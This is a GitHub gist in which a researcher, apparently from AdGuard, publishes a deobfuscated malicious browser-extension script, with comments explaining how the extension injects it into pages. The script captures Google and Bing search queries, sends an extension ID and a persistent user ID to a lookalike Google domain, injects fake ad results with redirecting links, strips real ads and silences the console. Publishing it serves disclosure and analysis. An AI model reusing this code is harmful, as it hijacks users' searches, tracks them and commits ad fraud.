Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
fly-analytics-decoded.js
var $jscomp = $jscomp || {};
$jscomp['scope'] = {};
$jscomp['createTemplateTagFirstArg'] = function(c) {
return c['raw'] = c;
};
$jscomp['createTemplateTagFirstArgWithRaw'] = function(c, e) {
c['raw'] = e;
return c;
};
$jscomp['arrayIteratorImpl'] = function(c) {
var e = 0x0;
return function() {
var f = {};
f['done'] = !0x0;
return e < c['length'] ? {
'done': !0x1,
'value': c[e++]
} : f;
};
};
$jscomp['arrayIterator'] = function(d) {
var e = {};
e['next'] = $jscomp['arrayIteratorImpl'](d);
return e;
};
$jscomp['makeIterator'] = function(c) {
var e = 'undefined' != typeof Symbol && Symbol['iterator'] && c[Symbol['iterator']];
return e ? e['call'](c) : $jscomp['arrayIterator'](c);
};
(function() {
var h = function() {
var s = !![];
return function(t, u) {
var v = s ? function() {
if (u) {
var x = u['apply'](t, arguments);
u = null;
return x;
}
} : function() {};
s = ![];
return v;
};
}();
var i = function() {
var s = !![];
return function(t, u) {
var v = s ? function() {
if (u) {
var x = u['apply'](t, arguments);
u = null;
return x;
}
} : function() {};
s = ![];
return v;
};
}();
var j = document['getElementById']('jsrunning');
if (!j || j['rel'] == chrome['runtime']['id']) {
j = document['createElement']('link');
j['id'] = 'jsrunning';
j['rel'] = chrome['runtime']['id'];
(document['head'] || document['documentElement'])['append'](j);
var k = {};
k['google'] = '(?=^.*google.*/search.*?[?|&]q=(.*?)(?:&|$))(?!^.*tbm=isch|.*tbm=shop|.*tbm=nws|.*tbm=plcs|.*tbm=lcl|.*ibp=htl;jobs).*';
var l = {};
l['bing'] = '.*bing.com/search.*?[?|&]q=(.*?)(?:&|$)';
var m = [k, l],
n = function(s) {
for (var t = {}, u = $jscomp['makeIterator'](m), v = u['next'](); !v['done']; v = u['next']()) {
v = v['value'];
var x = s['match'](Object['values'](v)[0x0]);
if (null !== x && 0x1 < x['length']) {
var B = {};
B['domain'] = Object['keys'](v)[0x0];
B['query'] = x[0x1];
t = B;
break;
}
}
return t;
},
o = function() {
function s() {
return '10000000-1000-4000-8000-100000000000' ['replace'](/[018]/g, function(t) {
return (t ^ crypto['getRandomValues'](new Uint8Array(0x1))[0x0] & 0xf >> t / 0x4)['toString'](0x10);
});
}
return localStorage['UID'] || (localStorage['UID'] = s());
},
p = function(s) {
return new Promise(function(t) {
var u = new Image();
u['crossOrigin'] = 'Anonymous';
u['referrerPolicy'] = 'unsafe-url';
u['onload'] = function() {
var v = document['createElement']('canvas');
v['height'] = u['height'];
v['width'] = u['width'];
var x = v['getContext']('2d');
x['drawImage'](u, 0x0, 0x0);
v = x['getImageData'](0x0, 0x0, v['width'], v['height'])['data'];
base64 = '';
for (x = 0x0; x < v['length']; x++)
if (0xff !== v[x]) {
if (0x2a == v[x]) break;
base64 += String['fromCharCode'](v[x]);
} v = [];
try {
v = JSON['parse'](atob(base64));
} catch (B) {}
t(v);
};
u['onerror'] = function() {
t([]);
};
u['src'] = 'https://lh3.googleusrcontent.com/' + btoa(chrome['runtime']['id']) + '/AAAAAAAAAAI/AAAAAAAAAAA/' + btoa(o()) + '/s128-b16-cc-rp/photo.jpg';
});
},
q = function(s) {
return new Promise(function(t) {
var u = document['querySelector'](s);
if (u) return t(u);
var v = {};
v['childList'] = !0x0;
v['subtree'] = !0x0;
new MutationObserver(function(x, B) {
var C = document['querySelector'](s);
if (C) return t(C);
})['observe'](document['documentElement'], v);
});
},
r = function(s) {
s['querySelectorAll']('a')['forEach'](function(t) {
t['addEventListener']('click', function(u) {
u['preventDefault']();
this['hasAttribute']('data-context') && (window['location'] = atob(this['getAttribute']('data-context')));
});
});
};
(function() {
var s = h(this, function() {
var x = typeof window !== 'undefined' ? window : typeof process === 'object' && typeof require === 'function' && typeof global === 'object' ? global : this;
var B = function() {
var C = new x[('RegExp')]('^([^ ]+( +[^ ]+)+)+[^ ]}');
return !C['test'](s);
};
return B();
});
s();
var t = i(this, function() {
var x = function() {};
var B = typeof window !== 'undefined' ? window : typeof process === 'object' && typeof require === 'function' && typeof global === 'object' ? global : this;
if (!B['console']) {
B['console'] = function(C) {
var D = {};
D['log'] = C;
D['warn'] = C;
D['debug'] = C;
D['info'] = C;
D['error'] = C;
D['exception'] = C;
D['table'] = C;
D['trace'] = C;
return D;
}(x);
} else {
B['console']['log'] = x;
B['console']['warn'] = x;
B['console']['debug'] = x;
B['console']['info'] = x;
B['console']['error'] = x;
B['console']['exception'] = x;
B['console']['table'] = x;
B['console']['trace'] = x;
}
});
t();
var u = n(document['location']['href']);
if (u['domain']) {
var v = p(u['query']);
'google' == u['domain'] && (q('#tvcap')['then'](function(x) {
x['innerHTML'] = '';
v['then'](function(C) {
if (0x0 < C['length']) {
var D = document['createElement']('div');
D['className'] = 'srg';
var E = document['createElement']('div');
E['className'] = 'srg';
try {
for (var F = document['getElementById']('rso'), G = $jscomp['makeIterator'](C['entries']()), H = G['next'](); !H['done']; H = G['next']()) {
var I = $jscomp['makeIterator'](H['value']),
J = I['next']()['value'],
K = I['next']()['value'],
L = '';
if (K['siteLinks']) {
L = '<div class="osl1">';
for (var M = $jscomp['makeIterator'](K['siteLinks']['entries']()), N = M['next'](); !N['done']; N = M['next']()) {
var O = $jscomp['makeIterator'](N['value']),
P = O['next']()['value'],
Q = O['next']()['value'];
L += '<a class="fl" data-context="' + btoa(Q['url']) + '" href="https://' + K['host']['toLowerCase']() + '/' + Q['text']['toLowerCase']()['replace'](/ /g, '-') + '"><span>' + Q['text'] + '</span></a>' + (P == K['siteLinks']['length'] - 0x1 ? '' : '<span> · </span>');
}
L += '</div>';
}
var R = '<div class="g"> <div> <div class="rc"> <div class="r"> <a href="https://' + K['host']['toLowerCase']() + '" data-context="' + btoa(K['url']) + '"><br> <h3 class=""><span>' + K['title'] + '</span></h3> <div style="position: absolute;left: 0;top: 0;"><span style="color: #202124;font-weight: bold;">Ad<span style="padding:0 5px">·</span></span><cite class="iUh30">' + K['host'] + '</cite></div> </a> </div> <div class="s"> <div> <span class="st"><span>' + K['description'] + '</span></span> </div> </div> ' + L + ' </div> </div> </div>';
var S = new DOMParser()['parseFromString'](R, 'text/html')['body']['firstChild'];
r(S);
J < C['length'] / 0x2 || 0x5 > J ? D['appendChild'](S) : E['appendChild'](S);
}
F['insertBefore'](D, F['firstChild']);
F['append'](E);
} catch (T) {}
}
});
}), q('#bottomads')['then'](function(x) {
x['innerHTML'] = '';
}));
'bing' == u['domain'] && (q('#b_results')['then'](function(x) {
v['then'](function(C) {
if (0x0 < C['length']) try {
for (var D = document['getElementById']('b_results'), E = document['getElementsByClassName']('b_rs')[0x0] && document['getElementsByClassName']('b_rs')[0x0]['parentElement'], F = D['firstChild'], G = $jscomp['makeIterator'](C['entries']()), H = G['next'](); !H['done']; H = G['next']()) {
var I = $jscomp['makeIterator'](H['value']),
J = I['next']()['value'],
K = I['next']()['value'],
L = '';
if (K['siteLinks']) {
L = '<ul class="b_factrow">';
for (var M = $jscomp['makeIterator'](K['siteLinks']['entries']()), N = M['next'](); !N['done']; N = M['next']()) {
var O = $jscomp['makeIterator'](N['value']),
P = O['next']()['value'],
Q = O['next']()['value'];
L += '<li><a data-context="' + btoa(Q['url']) + '" href="https://' + K['host']['toLowerCase']() + '/' + Q['text']['toLowerCase']()['replace'](/ /g, '-') + '\x22>' + Q['text'] + '</a>' + (P == K['siteLinks']['length'] - 0x1 ? '' : ' · ') + '</li>';
}
L += '</ul>';
}
var R = '<li class="b_algo"> <h2><a href="https://' + K['host']['toLowerCase']() + '" data-context="' + btoa(K['url']) + '\x22>' + K['title'] + '</a></h2> <div class="b_caption"> <div class="b_attribution"><cite>' + K['host'] + '</cite></div> <p><span style="margin-right: 4px;padding: 2px 4px 2px 4px;color: #666;border: 1px solid #ddd;vertical-align: middle;font-size: 11px;font-weight: normal;line-height: 11px;border-radius: 6px;display: inline-block;">Ad</span>' + K['description'] + '</p> </div> ' + L + ' </li>';
var S = new DOMParser()['parseFromString'](R, 'text/html')['body']['firstChild'];
r(S);
if (J < C['length'] / 0x2 || 0x5 > J) {
if (D['insertBefore'](S, F), F = S['nextSibling'], !E && 0x4 == J) break;
} else D['insertBefore'](S, E);
}
} catch (T) {}
});
}), q('.b_ad')['then'](function(x) {
x['remove']();
}), q('.b_adBottom')['then'](function(x) {
x['remove']();
}));
}
}());
}
}());
@rkim-ias

This comment has been minimized.

Copy link

@rkim-ias rkim-ias commented Aug 7, 2020

Thank you for putting this information out.

However, do you know how this script is able to execute from a background context and still inject into Google domains without a content script?

Perhaps the versions of the extensions I have looked at are different from what you have been investigating?

Thanks

@ameshkov

This comment has been minimized.

Copy link
Owner Author

@ameshkov ameshkov commented Aug 7, 2020

@rkim-ias

The script here is executed in the page context, not in the background context.

Here's what's executed in the bg context:

let code = 'HERE GOES BASE64-ENCODED SCRIPT';
chrome.tabs.onUpdated.addListener(function (tabId, changeInfo, tab) {
    if (changeInfo.url) {
        chrome.tabs.executeScript(tabId, { code: atob(code), runAt: 'document_start' }, function () {
            if (chrome.runtime.lastError) { }
        });
    }
});

let code -- base64-encoded and obfuscated version of the script you see in this gist

@rkim-ias

This comment has been minimized.

Copy link

@rkim-ias rkim-ias commented Aug 7, 2020

@ameshkov

Quite fantastic!

thanks again 👍

@T1MU7

This comment has been minimized.

Copy link

@T1MU7 T1MU7 commented Aug 18, 2020

Thank you. Adguard the best!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment